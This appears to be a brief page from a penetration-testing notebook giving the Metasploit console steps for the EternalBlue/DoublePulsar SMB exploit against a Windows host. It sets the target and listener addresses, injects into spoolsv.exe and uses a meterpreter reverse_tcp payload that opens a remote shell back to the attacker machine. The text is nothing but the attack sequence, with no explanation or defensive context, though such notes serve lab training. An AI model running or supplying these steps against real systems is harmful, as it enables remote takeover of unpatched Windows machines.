Double Pulsar
use exploit\windows\smb\eternalblue_doublepulsar
show options
set TARGETARCHITECTURE x86
set DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar/deps
set ETERNALBLUEPATH /root/Eternalblue-Doublepulsar/deps
set RHOST 10.1.1.107
set LHOST 10.1.1.100
set PROCESSINJECT spoolsv.exe
set PAYLOAD windows/meterpreter/reverse_tcp
show options
run
Last updated